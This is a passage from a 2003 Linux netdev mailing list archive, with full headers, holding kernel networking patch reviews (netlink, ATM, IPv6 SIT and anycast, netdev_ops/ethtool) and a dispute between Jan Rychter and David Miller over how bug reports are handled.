Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sat, 12 Jul 2003 01:37:44 +1000 (EST) James Morris wrote: > Indeed, the kernel socket buffer fills up. > > I think this needs to be addressed in the netlink code, per the patch > below. ... > + /* Don't bother queuing skb if kernel socket has no input function */ > + if (nlk->pid == 0 && !nlk->data_ready) > + goto no_dst; > + Oops, turns out this doesn't work. data_ready is never NULL, look at how netlink_kernel_create() works. Also, the broadcast case probably needs to be handled too? As an aside, to be honest what's so wrong with the socket receive buffer filling up? The damage is limited to the receive buffer size of the kernel netlink socket, but that's it. From davem@redhat.com Fri Jul 11 22:52:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 22:53:04 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C5qw2x030111 for ; Fri, 11 Jul 2003 22:52:58 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA31850; Fri, 11 Jul 2003 22:44:13 -0700 Date: Fri, 11 Jul 2003 22:44:13 -0700 From: "David S. Miller" To: Krzysztof Halasa Cc: netdev@oss.sgi.com Subject: Re: 2.5.74 X.25+LAPB still kills the kernel Message-Id: <20030711224413.6aa70649.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3978 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On 11 Jul 2003 19:27:28 +0200 Krzysztof Halasa wrote: > No need to actually use X.25+LAPB, it's enough to just compile it in. Hmmm, if nobody is listening on linux-x25 and neither is the listed "MAINTAINER" eis@baty.hanse.de we should update the linux/MAINTAINERS file to be in sync with reality. Anyways, I'll try to look into this if nobody else does. Thanks for reporting this to the right place finally, as a reward your bug will be looked at and hopefully fixed. From davem@redhat.com Sat Jul 12 00:02:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 00:03:00 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C71k2x031096 for ; Sat, 12 Jul 2003 00:02:26 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA32018; Fri, 11 Jul 2003 23:52:47 -0700 Date: Fri, 11 Jul 2003 23:52:47 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][2.4] more atm changes backported to 2.4 Message-Id: <20030711235247.43f05654.davem@redhat.com> In-Reply-To: <200307102033.h6AKXtsG006493@ginger.cmf.nrl.navy.mil> References: <200307102033.h6AKXtsG006493@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3979 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 10 Jul 2003 16:31:32 -0400 chas williams wrote: > # ChangeSet 1.1014 -> 1.1015 > # net/atm/lec.c 1.15 -> 1.16 > # > # The following is the BitKeeper ChangeSet Log > # -------------------------------------------- > # 03/06/27 chas@relax.cmf.nrl.navy.mil 1.1015 > # elminate cli, make function names sane > # -------------------------------------------- Forgot some net/atm/lec.h changes for this one Chas? :-( See the patch below I had to add to my tree to get things building again. Chas, please, type "make" in a tree that has only the patches you are sending me applied. I know you said to me this is "hard" for you to do, but after this I really need you to start doing this. Thanks. # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1084 -> 1.1085 # net/atm/lec.h 1.4 -> 1.5 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/11 davem@nuts.ninka.net 1.1085 # [ATM]: Fix build, missing lec_priv member. # -------------------------------------------- # diff -Nru a/net/atm/lec.h b/net/atm/lec.h --- a/net/atm/lec.h Fri Jul 11 23:58:23 2003 +++ b/net/atm/lec.h Fri Jul 11 23:58:23 2003 @@ -101,7 +101,7 @@ establishes multiple Multicast Forward VCCs to us. This list collects all those VCCs. LANEv1 client has only one item in this list. These entries are not aged out. */ - atomic_t lec_arp_lock_var; + atomic_t lec_arp_users; struct atm_vcc *mcast_vcc; /* Default Multicast Send VCC */ struct atm_vcc *lecd; struct timer_list lec_arp_timer; From mika.liljeberg@welho.com Sat Jul 12 00:56:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 00:56:47 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C7tp2x031862 for ; Sat, 12 Jul 2003 00:56:32 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6C7tipV001173; Sat, 12 Jul 2003 10:55:44 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6C7thqI001171; Sat, 12 Jul 2003 10:55:43 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: YOSHIFUJI Hideaki Cc: netdev@oss.sgi.com Content-Type: multipart/mixed; boundary="=-5E2h62/6eEALX4jFy4kC" Message-Id: <1057996543.1142.12.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 12 Jul 2003 10:55:43 +0300 X-archive-position: 3980 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev --=-5E2h62/6eEALX4jFy4kC Content-Type: text/plain Content-Transfer-Encoding: 7bit Ok, I've separated out the SIT fix. A revised anycast fix will follow. This is against 2.5.75. The patch will allow a host to set up SIT tunnels using gateway routes to 6to4 addresses. Previously this only worked with an IPv4-compatible address. Use of the deprecated IPv4-compatible addresses should not be required. Thanks, MikaL --=-5E2h62/6eEALX4jFy4kC Content-Disposition: attachment; filename=2.5.75-sit.udiff Content-Type: text/x-patch; name=2.5.75-sit.udiff; charset=ISO-8859-15 Content-Transfer-Encoding: quoted-printable diff -ur orig/linux-2.5.75/net/ipv6/sit.c linux-2.5.75/net/ipv6/sit.c --- orig/linux-2.5.75/net/ipv6/sit.c 2003-07-10 23:14:48.000000000 +0300 +++ linux-2.5.75/net/ipv6/sit.c 2003-07-12 10:00:27.000000000 +0300 @@ -472,10 +472,13 @@ addr_type =3D ipv6_addr_type(addr6); } =20 - if ((addr_type & IPV6_ADDR_COMPATv4) =3D=3D 0) - goto tx_error_icmp; + if (addr_type & IPV6_ADDR_COMPATv4) + dst =3D addr6->s6_addr32[3]; + else + dst =3D try_6to4(addr6); =20 - dst =3D addr6->s6_addr32[3]; + if (!dst) + goto tx_error_icmp; } =20 { --=-5E2h62/6eEALX4jFy4kC-- From mika.liljeberg@welho.com Sat Jul 12 01:13:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 01:13:27 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6C8DE2x032402 for ; Sat, 12 Jul 2003 01:13:15 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6C8DApV001246; Sat, 12 Jul 2003 11:13:11 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6C8DAZ2001245; Sat, 12 Jul 2003 11:13:10 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: [PATCH] IPv6: Fix broken anycast usage From: Mika Liljeberg To: YOSHIFUJI Hideaki Cc: netdev@oss.sgi.com Content-Type: multipart/mixed; boundary="=-z/elxEQiE2HR9qGdA6GJ" Message-Id: <1057997590.1142.31.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 12 Jul 2003 11:13:10 +0300 X-archive-position: 3981 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev --=-z/elxEQiE2HR9qGdA6GJ Content-Type: text/plain Content-Transfer-Encoding: 7bit This is against 2.5.75. The patch fixes several places where anycast addresses should be treated equivalently with unicast addresses. In particular, this includes tunnels and routes pointing to anycast addresses. I modified ipv6_addr_type() to return IPV6_ADDR_UNICAST also for anycast addresses. IPV6_ADDR_ANYCAST is now added as an additional flag when the address is one of the known anycast addresses. I looked very hard at neighbor discovery and didn't see anything that needs to be changed, but you might want to have a second look. One small difference is that ND will now also try respond to neighbor solicitations coming from known anycast addresses (very unlikely). IMHO, this doesn't need to be policed. In general, there is no reliable way to check if a remote address is anycast, anyway. From RFC2461: Note that an anycast address is syntactically indistinguishable from a unicast address. Thus, nodes sending packets to anycast addresses don't generally know that an anycast address is being used. Throughout the rest of this document, references to unicast addresses also apply to anycast addresses in those cases where the node is unaware that a unicast address is actually an anycast address. Thanks, MikaL --=-z/elxEQiE2HR9qGdA6GJ Content-Disposition: attachment; filename=2.5.75-anycast.udiff Content-Type: text/x-patch; name=2.5.75-anycast.udiff; charset=ISO-8859-15 Content-Transfer-Encoding: quoted-printable diff -ur orig/linux-2.5.75/net/ipv6/addrconf.c linux-2.5.75/net/ipv6/addrco= nf.c --- orig/linux-2.5.75/net/ipv6/addrconf.c 2003-07-10 23:14:49.000000000 +03= 00 +++ linux-2.5.75/net/ipv6/addrconf.c 2003-07-12 10:01:57.000000000 +0300 @@ -208,16 +208,15 @@ break; }; return type; - } + } else + type =3D IPV6_ADDR_UNICAST; + /* check for reserved anycast addresses */ -=09 if ((st & htonl(0xE0000000)) && ((addr->s6_addr32[2] =3D=3D htonl(0xFDFFFFFF) && (addr->s6_addr32[3] | htonl(0x7F)) =3D=3D (u32)~0) || (addr->s6_addr32[2] =3D=3D 0 && addr->s6_addr32[3] =3D=3D 0))) - type =3D IPV6_ADDR_ANYCAST; - else - type =3D IPV6_ADDR_UNICAST; + type |=3D IPV6_ADDR_ANYCAST; =20 /* Consider all addresses with the first three bits different of 000 and 111 as finished. --=-z/elxEQiE2HR9qGdA6GJ-- From jgarzik@pobox.com Sat Jul 12 10:24:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 10:25:26 -0700 (PDT) Received: from www.linux.org.uk (IDENT:p8IVHij2EXDoJU90FZ48wJG5lCKwF35U@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6CHO72x007439 for ; Sat, 12 Jul 2003 10:24:48 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19b5GU-0007my-Jt; Fri, 11 Jul 2003 22:17:14 +0100 Message-ID: <3F0F294F.4060804@pobox.com> Date: Fri, 11 Jul 2003 17:17:03 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Matthew Wilcox CC: netdev@oss.sgi.com Subject: Re: [PATCH] Move eth_mac_addr and eth_change_mtu References: <20030711181946.GG20424@parcelfarce.linux.theplanet.co.uk> <20030711182330.GC16037@gtf.org> <20030711182530.GH20424@parcelfarce.linux.theplanet.co.uk> <3F0F24B1.5050200@pobox.com> <20030711210522.GM20424@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030711210522.GM20424@parcelfarce.linux.theplanet.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3982 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > On Fri, Jul 11, 2003 at 04:57:21PM -0400, Jeff Garzik wrote: > >>Well, I don't see/understand this next-stage, so elaboration would be >>nice. As-is, I do not support merging this patch. > > > It's the next stage you're calling for -- move these functions: > > dev->change_mtu = eth_change_mtu; > dev->hard_header = eth_header; > dev->rebuild_header = eth_rebuild_header; > dev->set_mac_address = eth_mac_addr; > dev->hard_header_cache = eth_header_cache; > dev->header_cache_update= eth_header_cache_update; > dev->hard_header_parse = eth_header_parse; > > into netdev_ops. Which means each driver will need to see them. Drivers don't need to see them now, they shouldn't need to see them after netdev_ops. It's hidden by ether_setup. > I thought I could justify moving these functions already on the grounds > that if you were looking for the definition of eth_change_mtu(), > net_init.c would be a much less likely place to look than > net/ethernet/eth.c If you're gonna do that, move all of ether_setup, alloc_etherdev, etc. Don't just move two out of ~10 functions. Jeff From khc@pm.waw.pl Sat Jul 12 11:23:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 11:23:58 -0700 (PDT) Received: from hq.pm.waw.pl (hq.pm.waw.pl [195.116.170.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6CIMa2x008155 for ; Sat, 12 Jul 2003 11:23:20 -0700 Received: by hq.pm.waw.pl (Postfix, from userid 10) id 61C28322F; Sat, 12 Jul 2003 20:22:33 +0200 (CEST) Received: by defiant.pm.waw.pl (Postfix, from userid 500) id 92DB63C7BC; Sat, 12 Jul 2003 18:03:36 +0200 (CEST) To: Cc: netdev@oss.sgi.com Subject: Logical interfaces (VLANs etc) flow control From: Krzysztof Halasa Date: 12 Jul 2003 18:03:35 +0200 Message-ID: Lines: 18 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3983 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: khc@pm.waw.pl Precedence: bulk X-list: netdev Hi, probably a simple question: do we currently do any flow control for logical subinterfaces (specifically 802.1q VLANs) similar to netif_{stop,wake}_queue on the main (physical) device? I notice "txqueuelen:0" on VLAN devices and vlan_dev_hard_start_xmit() seems to not do any flow control, but I wonder if there is something else? The problem is I'm doing the same with Frame Relay, should I add a TX queue to FR PVC devices and possibly stop/wake PVC device queue in sync with physical device queue? Possibly a pointer to faq or something? -- Krzysztof Halasa Network Administrator From linux-netdev@gmane.org Sat Jul 12 12:13:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 12:14:03 -0700 (PDT) Received: from main.gmane.org (main.gmane.org [80.91.224.249]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6CJCi2x008775 for ; Sat, 12 Jul 2003 12:13:25 -0700 Received: from root by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19bOyh-00025Y-00 for ; Sat, 12 Jul 2003 20:20:11 +0200 X-Injected-Via-Gmane: http://gmane.org/ To: netdev@oss.sgi.com Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19bNoy-0006za-00 for ; Sat, 12 Jul 2003 19:06:04 +0200 From: Jan Rychter Subject: Re: networking bugs and bugme.osdl.org Date: Sat, 12 Jul 2003 10:07:42 -0700 Lines: 81 Message-ID: References: <1056755336.5459.16.camel@dhcp22.swansea.linux.org.uk> <20030627.172123.78713883.davem@redhat.com> <1056827972.6295.28.camel@dhcp22.swansea.linux.org.uk> <20030628.150328.74739742.davem@redhat.com> Mime-Version: 1.0 Content-Type: multipart/signed; boundary="=-=-="; micalg=pgp-sha1; protocol="application/pgp-signature" X-Complaints-To: usenet@main.gmane.org X-Spammers-Please: blackholeme@rychter.com User-Agent: Gnus/5.1003 (Gnus v5.10.3) XEmacs/21.4 (Rational FORTRAN, linux) Cancel-Lock: sha1:Q5NfW1XO9gryg4flfNXqetJHZ5Y= Cc: linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Cc: linux-net@vger.kernel.org, netdev@oss.sgi.com X-archive-position: 3984 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jan@rychter.com Precedence: bulk X-list: netdev --=-=-= Content-Transfer-Encoding: quoted-printable >>>>> "David" =3D=3D David S Miller writes: David> From: Alan Cox Date: 28 Jun 2003 David> 20:19:32 +0100 David> On Sad, 2003-06-28 at 01:21, David S. Miller wrote: >> I respond to private reports with "please send this to the lists, >> what if I were on vacation for the next month?" I never actually >> process or analyze such reports. =20=20=20 David> Which means you miss stuff. David> Not my problem Alan. If the user gives a crap about their David> report mattering, they'll do what I ask them to do. If users David> send their report to the wrong place, it will get lost, just David> like if their cat their report into /dev/null. I have no reason David> to feel bad about the information getting lost. David> If it's too much for them to do as I ask, it's too much for me David> to consider their report. [...] I think this is one of the largest problems of the current Linux development model. Many people seem to divide people into 'users' (who aren't particularly useful) and 'developers', who actually do something. People (like me), who can devote a _little_ time to narrowing down and reporting bugs fall into the 'user-whiner' class. And get ignored. What results is that you only get bug reports from active developers. Which means that rare bugs don't get fixed. David> It is not a dream, it works perfectly fine and has done so for David> 5+ years of Linux maintainence. It hasn't. The result is a system that works for you (and other active developers), but not for everyone. As an example -- try running Linux on a modern laptop, connecting some USB devices, using ACPI, or bluetooth. Observe the resulting problems and crashes. You'll hit loads of obscure bugs that have been reported, but never got looked at in detail. I certainly have hit them and reported most, and most got dropped in various places. Does this mean these are unimportant bugs? No. This does indeed mean (following your thinking) that these aren't important bugs for me. I have worked around them in various ways, some involving actually buying new hardware, or not using certain features at all. And the cycle will go on -- others will hit the bugs, report them once, see them dropped, move on. David> Let's see, what makes more sense from my perspective. Should I David> reward and put forth effort for the people who fart a bug report David> onto the lists and expect everyone to stop what they're doing David> and fix the bug, or should I reward and put forth effort for the David> guy who spent the time to put together a stellar bug report and David> also doesn't mind retransmitting it from time to time whilst David> everyone is busy? Interesting you should think you're 'rewarding' people. I thought your goal was to have fun working on cool software and making it better. I also thought I had the same goal as a bug-reporter. When I write software, I care about every bug report and consider people doing the reporting a very valuable resource. =2D-J. --=-=-= Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQA/EEBjLth4/7/QhDoRAra7AKDtnJwjGSrjhkFYu4jPKWcdBD/uagCcCl1c J0eXeqyfh5xI4A8QMxI5PkE= =MxwA -----END PGP SIGNATURE----- --=-=-=-- From jmorris@intercode.com.au Sat Jul 12 18:18:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 18:19:19 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:PsivF3FBFfmhRFGIeTcmfMF0XWh/G824@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D1Hu2x011710 for ; Sat, 12 Jul 2003 18:18:38 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6D1HZr20795; Sun, 13 Jul 2003 11:17:36 +1000 Date: Sun, 13 Jul 2003 11:17:35 +1000 (EST) From: James Morris To: "David S. Miller" cc: jkenisto@us.ibm.com, , , , , , , Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting In-Reply-To: <20030711224142.557b5b5e.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3985 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, David S. Miller wrote: > > + /* Don't bother queuing skb if kernel socket has no input function */ > > + if (nlk->pid == 0 && !nlk->data_ready) > > + goto no_dst; > > + > > Oops, turns out this doesn't work. data_ready is never NULL, look at > how netlink_kernel_create() works. It's ok: sk->data_ready is never null, but nlk_sk(sk)->data_ready will be null unless an input function is provided there. > Also, the broadcast case probably needs to be handled > too? Netlink sockets created by netlink_kernel_create() do not subscribe to any groups and are not broadcast to. > As an aside, to be honest what's so wrong with the socket receive > buffer filling up? The damage is limited to the receive buffer size > of the kernel netlink socket, but that's it. Agreed, it's not really harmful, but it's sloppy. Better to let the application know that it can't send to the socket rather than let it keep sending (with successful return codes) until the kernel socket buffer fills up. - James -- James Morris From willy@www.linux.org.uk Sat Jul 12 18:53:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 18:54:00 -0700 (PDT) Received: from www.linux.org.uk (IDENT:r46fv53QoBIe7CoSSmiWelpE7m7RR7rz@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D1qh2x012176 for ; Sat, 12 Jul 2003 18:53:24 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19b480-0005W7-18; Fri, 11 Jul 2003 21:04:24 +0100 Date: Fri, 11 Jul 2003 21:04:23 +0100 From: Matthew Wilcox To: Jeff Garzik Cc: Matthew Wilcox , netdev@oss.sgi.com, greearb@candelatech.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops Message-ID: <20030711200423.GL20424@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <20030711193215.GH16037@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711193215.GH16037@gtf.org> User-Agent: Mutt/1.4.1i X-archive-position: 3986 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 03:32:15PM -0400, Jeff Garzik wrote: > 1) The _ops are either too limited in scope, or too wide in scope. Couldn't agree more. I blame acme -- he wants me to push it to be much wider in scope. Let's push _all_ the function pointers into netdev_ops. But this is a mere step 1. I don't have enough network-related clout to do everything in one fell swoop. > 2.c) If #2 is decided to be netdev_ops, and all func ptrs are moved into > netdev_ops struct, then create the macro > SET_NETDEV_OPS(dev, ops) > > This allows full back compat, without ugliness in mainline tree. Yes, that was my preferred approach. > 3) The func ptrs _count() are totally bogus. We have an unconditional > indirect reference to a function call which does nothing but return a > driver constant. > > I personally think that having ethtool_ops members manually calling > the ->get_drvinfo hook is a _lot_ cleaner than 10,000 foo_count hooks. Disagree. I'd like to completely get rid of the ->get_drvinfo hook and have each hook return one thing. DaveM claims that these things are not always constants, and I believe him -- it's entirely possible different revs of a chip (with the same driver) may have more or fewer registers to return, for example. We might want to put these counts directly in the net_device itself and eliminate the function calls. That would make sense. > 4) I don't see why ethtool.h suddenly needs to include linux/types.h, > when it hasn't needed it in all this time until now. Otherwise you have to include before you include which sucks. No relying on other people to do your inclusions for you ;-) > 5) net/socket.c changes appear unrelated to this patch. You're right, they just happen to be in that tree. > 6) (low prio) Add documentation to > Documentation/networking/netdevices.txt. Most importantly, this > documents locking/context. An excellent idea. > 7) (low prio) All that similar code in net/core/ethtool.c can be > template-ized with a macro, IMO. Something like > DEF_ETHTOOL_GOP(get_coalesce, ETHTOOL_GCOALESCE, ethtool_coalesce); > DEF_ETHTOOL_SOP(set_coalesce, ethtool_coalesce); > (and templates for the ops that use edata) Maybe. I'm not a fan of templated ops as it makes it harder to grep. > 8) (security) get-eeprom op needs to check that offset+len is not > invalid, and does not wrap. Good idea, I'll add that check now. > 9) phys_id op should return an error, for consistency if nothing else. > It's simple for driver authors to unconditionally return 0 if their code > has no failure cases, and it's a slow path so adding the return in the > driver code is no big deal. OK, ditto. > 10) (low prio) since it's a slow path, what about replacing the switch > statement in dev_ethtool() with a lookup table? All the ethtool > commands are low numbers. If you do this, I would suggest using the gcc > array initializer syntax: > [ETHTOOL_GCOALESCE, ethtool_get_coalesce] > > All the ethtool ops have the same prototype, after all. Well, they don't have quite the same prototype ... that's part of the point -- get the type safety going as early as possible. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From davem@redhat.com Sat Jul 12 22:31:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 22:32:36 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D5VIFl019739 for ; Sat, 12 Jul 2003 22:31:59 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01455; Sat, 12 Jul 2003 22:22:22 -0700 Date: Sat, 12 Jul 2003 22:22:22 -0700 From: "David S. Miller" To: Jan Rychter Cc: linux-net@vger.kernel.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: networking bugs and bugme.osdl.org Message-Id: <20030712222222.01089864.davem@redhat.com> In-Reply-To: References: <1056755336.5459.16.camel@dhcp22.swansea.linux.org.uk> <20030627.172123.78713883.davem@redhat.com> <1056827972.6295.28.camel@dhcp22.swansea.linux.org.uk> <20030628.150328.74739742.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3987 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sat, 12 Jul 2003 10:07:42 -0700 Jan Rychter wrote: > Interesting you should think you're 'rewarding' people. I thought your > goal was to have fun working on cool software and making it > better. I also thought I had the same goal as a bug-reporter. > > When I write software, I care about every bug report and consider people > doing the reporting a very valuable resource. The whole game changes when you are stretched as thinly as I am. Scaling becomes everything, and nitpicking through vague and poorly composed bug reports is an absolute waste of my time as networking subsystem maintainer. If other people want to improve bug reports, put them into a cute usable database, and munge them along, that's fine with me. But _I_ only want to work with things that make the best use of my limited time. To be frank and honest, I do things that interest _ME_. And waddling through poorly made bug reports is anything but interesting, in fact it's frustrating work. I'd rather implement a software 802.11 stack or TCP Vegas implementation, THAT is what is a good use of my time because of my knowledge of how all these kinds of things work in the Linux networking. I can do things overnight that would take others weeks. Having me pillage through a bug database is a poor use of my time and capabilities. And all of my time is spent reviewing patches and dealing with the properly composed bug reports anyways, so even if I enjoyed pillaging through badly made bug reports I couldn't. People are assuming that just because _I_ don't want to work on the bad bug reports that I think nobody should. It's the exact opposite. I can't force other people to do or not do things anyways, just like everyone trying to somehow make it my "duty" to look at every single bug report cannot force me to do that. From jan@rychter.com Sat Jul 12 22:42:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 12 Jul 2003 22:43:08 -0700 (PDT) Received: from screech.rychter.com (screech.rychter.com [212.87.11.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6D5fqFl020082 for ; Sat, 12 Jul 2003 22:42:33 -0700 Received: from tnuctip.rychter.com (unknown [10.197.0.2]) by screech.rychter.com (Postfix) with ESMTP id BF06E4A605; Sun, 13 Jul 2003 07:41:34 +0200 (CEST) Received: from tnuctip.rychter.com (localhost.localdomain [127.0.0.1]) by tnuctip.rychter.com (8.12.8/8.12.8) with ESMTP id h6D5gcCY008578; Sat, 12 Jul 2003 22:42:38 -0700 Received: (from jwr@localhost) by tnuctip.rychter.com (8.12.8/8.12.8/Submit) id h6D5gcNC008576; Sat, 12 Jul 2003 22:42:38 -0700 To: "David S. Miller" Cc: linux-net@vger.kernel.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: networking bugs and bugme.osdl.org In-Reply-To: <20030712222222.01089864.davem@redhat.com> (David S. Miller's message of "Sat, 12 Jul 2003 22:22:22 -0700") References: <1056755336.5459.16.camel@dhcp22.swansea.linux.org.uk> <20030627.172123.78713883.davem@redhat.com> <1056827972.6295.28.camel@dhcp22.swansea.linux.org.uk> <20030628.150328.74739742.davem@redhat.com> <20030712222222.01089864.davem@redhat.com> User-Agent: Gnus/5.1003 (Gnus v5.10.3) XEmacs/21.4 (Rational FORTRAN, linux) X-Spammers-Please: blackholeme@rychter.com From: Jan Rychter Date: Sat, 12 Jul 2003 22:42:36 -0700 Message-ID: MIME-Version: 1.0 Content-Type: 